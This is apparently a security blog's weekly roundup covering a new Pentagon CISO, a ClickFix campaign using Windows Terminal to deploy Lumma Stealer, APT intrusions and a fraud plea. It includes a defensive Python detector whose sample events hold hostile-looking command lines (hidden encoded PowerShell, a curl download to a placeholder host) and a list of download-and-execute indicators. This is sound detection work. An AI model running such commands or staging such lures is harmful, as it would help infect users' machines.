Pentagon Gets New Leadership While Attackers Double Down on Social Engineering
You know those weeks where it feels like the threat actors are testing every possible attack vector? This past week was definitely one of those. While we’re seeing some positive changes in cybersecurity leadership, the bad guys are getting increasingly creative with their social engineering tactics.
New Sheriff in Town at the Pentagon
The Department of Defense just announced that James ‘Aaron’ Bishop will be stepping into the CISO role, replacing David McKeown who’s heading to the private sector after four decades of government service. Bishop’s appointment comes at a pretty critical time, especially given what we’re seeing with nation-state actors ramping up their activities.
McKeown leaves behind some big shoes to fill. Forty years in government cybersecurity means he’s seen it all – from the early days of network security through today’s sophisticated APT campaigns. Bishop’s going to inherit a complex threat environment, and frankly, the timing couldn’t be more challenging.
The Social Engineering Arms Race Heats Up
Speaking of sophisticated attacks, Microsoft just dropped some interesting research on a new ClickFix campaign that’s using Windows Terminal to deploy Lumma Stealer. What caught my attention here isn’t just the malware – it’s how the attackers are adapting their social engineering tactics.
Instead of the usual “copy and paste this into the Run dialog” approach we’ve seen for years, these attackers are now using Windows Terminal as their delivery mechanism. It’s a clever evolution because Terminal looks more legitimate to users, especially those who work in technical environments. The psychological aspect is brilliant – users see a terminal window and think “this must be a legitimate system process.”
This shift tells us something important about how attackers are thinking. They’re not just changing their tools; they’re studying user behavior and adapting their social engineering to match what people expect to see on modern systems.
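One way to turn that observation into a detection: a shell spawned by Windows Terminal is routine for engineers, but a shell spawned by Windows Terminal with hidden-window, encoded-command or download arguments is not. The script below is an added example written for this post, not code from Microsoft’s research or from the campaign itself. It assumes Sysmon-style process-creation records (Event ID 1 with Image, ParentImage, CommandLine and User fields), and every log line, user name, path and URL in it is constructed as a placeholder.

```python
"""Flag shells launched from Windows Terminal with download-and-execute style
arguments, the endpoint behaviour a ClickFix-style lure would leave behind."""
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style (Event ID 1, process creation) records. These lines
# are made up for this example and are not telemetry from the reported campaign;
# users, hostnames, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    # Benign: an engineer runs an inventory command from Windows Terminal.
    'EventID=1 User="CORP\\dev1" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.0_x64\\WindowsTerminal.exe" '
    'CommandLine="powershell.exe Get-ChildItem C:\\Projects"',
    # Suspicious: a pasted one-liner starting a hidden PowerShell with an encoded payload.
    'EventID=1 User="CORP\\finance2" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.0_x64\\WindowsTerminal.exe" '
    'CommandLine="powershell.exe -w hidden -ep bypass -EncodedCommand PLACEHOLDER_BASE64"',
    # Benign: a shell launched from Explorer is outside this rule's scope.
    'EventID=1 User="CORP\\dev1" '
    'Image="C:\\Windows\\System32\\cmd.exe" '
    'ParentImage="C:\\Windows\\explorer.exe" '
    'CommandLine="cmd.exe /c dir"',
    # Suspicious: cmd from Windows Terminal pulling a remote file into %TEMP%.
    'EventID=1 User="CORP\\hr7" '
    'Image="C:\\Windows\\System32\\cmd.exe" '
    'ParentImage="C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.0_x64\\WindowsTerminal.exe" '
    'CommandLine="cmd.exe /c curl http://example.invalid/update.txt -o %TEMP%\\u.cmd"',
]

# Parent process names for Windows Terminal (wt.exe is the launcher alias).
TERMINAL_PARENTS = {"windowsterminal.exe", "wt.exe"}
# Child interpreters a pasted lure would typically start.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Argument fragments that are rare in interactive admin use but common in pasted
# lures. Matching is case-insensitive on the lowercased command line.
SUSPICIOUS_ARGS = (
    "-encodedcommand", "-enc ", "-executionpolicy bypass", "-ep bypass",
    "-windowstyle hidden", "-w hidden", "invoke-webrequest", "iwr ",
    "downloadstring", "invoke-expression", "| iex", "curl ", "http://", "https://",
)

# key=value pairs; values with spaces are double-quoted in the sample layout.
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value record into a dict (quoted or bare values)."""
    return {key: (quoted or bare) for key, quoted, bare in _KV.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, for comparing process images."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (score, matched indicators); score 0 means out of scope or clean."""
    if basename(ev.get("ParentImage", "")) not in TERMINAL_PARENTS:
        return 0, []
    if basename(ev.get("Image", "")) not in SHELL_CHILDREN:
        return 0, []
    cmd = ev.get("CommandLine", "").lower()
    hits = [ind for ind in SUSPICIOUS_ARGS if ind in cmd]
    return len(hits), hits


def detect(lines: List[str], threshold: int = 2) -> List[Dict[str, object]]:
    """Return one alert per record whose indicator count reaches the threshold."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        score, hits = score_event(ev)
        if score >= threshold:
            alerts.append({
                "user": ev.get("User"),
                "child": basename(ev.get("Image", "")),
                "indicators": hits,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The threshold of two indicators is a tuning choice: a single `http://` in a command line is common for people fetching documentation from a terminal, while hidden-window plus encoded-command, or a download tool plus a URL, is the combination a pasted lure produces. Run over the constructed sample it flags the finance and HR users’ shells and leaves the engineer’s interactive session alone; on real telemetry, pair it with the parent-process context your EDR already records rather than relying on the command-line substrings by themselves.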
Nation-State Actors Stay Busy
While we’re dealing with evolving social engineering, the APT groups haven’t been sitting idle. We’ve got two significant campaigns worth discussing.
First, there’s a China-linked group that Cisco Talos is tracking as UAT-9244, which has been targeting telecommunications infrastructure across South America since 2024. They’re using three different implants – TernDoor, PeerTime, and BruteEntry – and hitting both Windows and Linux systems plus edge devices. The telecom targeting is particularly concerning because it gives them potential access to communications infrastructure across multiple countries.
What’s interesting is that Talos sees connections between this group and FamousSparrow, suggesting we might be looking at related operations or shared tooling within China’s broader cyber capabilities.
Then we have Iranian actors who’ve managed to compromise a US airport, bank, and software company. These attacks started in February, which means they’re happening right now – not some historical case study we’re analyzing months later. The fact that they’ve established persistence across such diverse targets suggests this is part of a broader intelligence-gathering operation.
The airport compromise is particularly noteworthy. We don’t often see detailed reporting on aviation sector attacks, but airports represent critical infrastructure with connections to both transportation systems and potentially sensitive passenger data.
Follow the Money
On the financial crime side, we’re seeing the conclusion of a massive case involving a Ghanaian national who just pleaded guilty to his role in a fraud ring that stole over $100 million through business email compromise and romance scams.
A hundred million dollars – that’s not some small-time operation. This kind of money suggests sophisticated organization and probably international coordination. BEC attacks continue to be incredibly effective because they exploit the human element rather than technical vulnerabilities.
What This Means for Our Defense Strategies
Looking at these incidents together, I see a few patterns worth considering. First, social engineering continues to evolve faster than our user awareness training. The ClickFix campaign using Windows Terminal shows attackers are studying how we educate users and then adapting their techniques accordingly.
Second, the nation-state activity across telecommunications and critical infrastructure suggests we need to be thinking about attacks that target operational technology and communications systems, not just traditional IT networks.
Finally, the financial crime numbers remind us that while we focus on sophisticated APTs, traditional fraud schemes are still generating massive profits for criminal organizations.
For those of us responsible for organizational security, this week reinforces the importance of defense in depth. We can’t rely solely on technical controls when attackers are getting this creative with social engineering, and we can’t ignore the human factor when nation-state actors are targeting critical infrastructure.
Sources
- James ‘Aaron’ Bishop Tapped to Serve as New Pentagon CISO
- Ghanaian man pleads guilty to role in $100 million fraud ring
- China-Linked Hackers Use TernDoor, PeerTime, BruteEntry in South American Telecom Attacks
- Iranian APT Hacked US Airport, Bank, Software Company
- Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer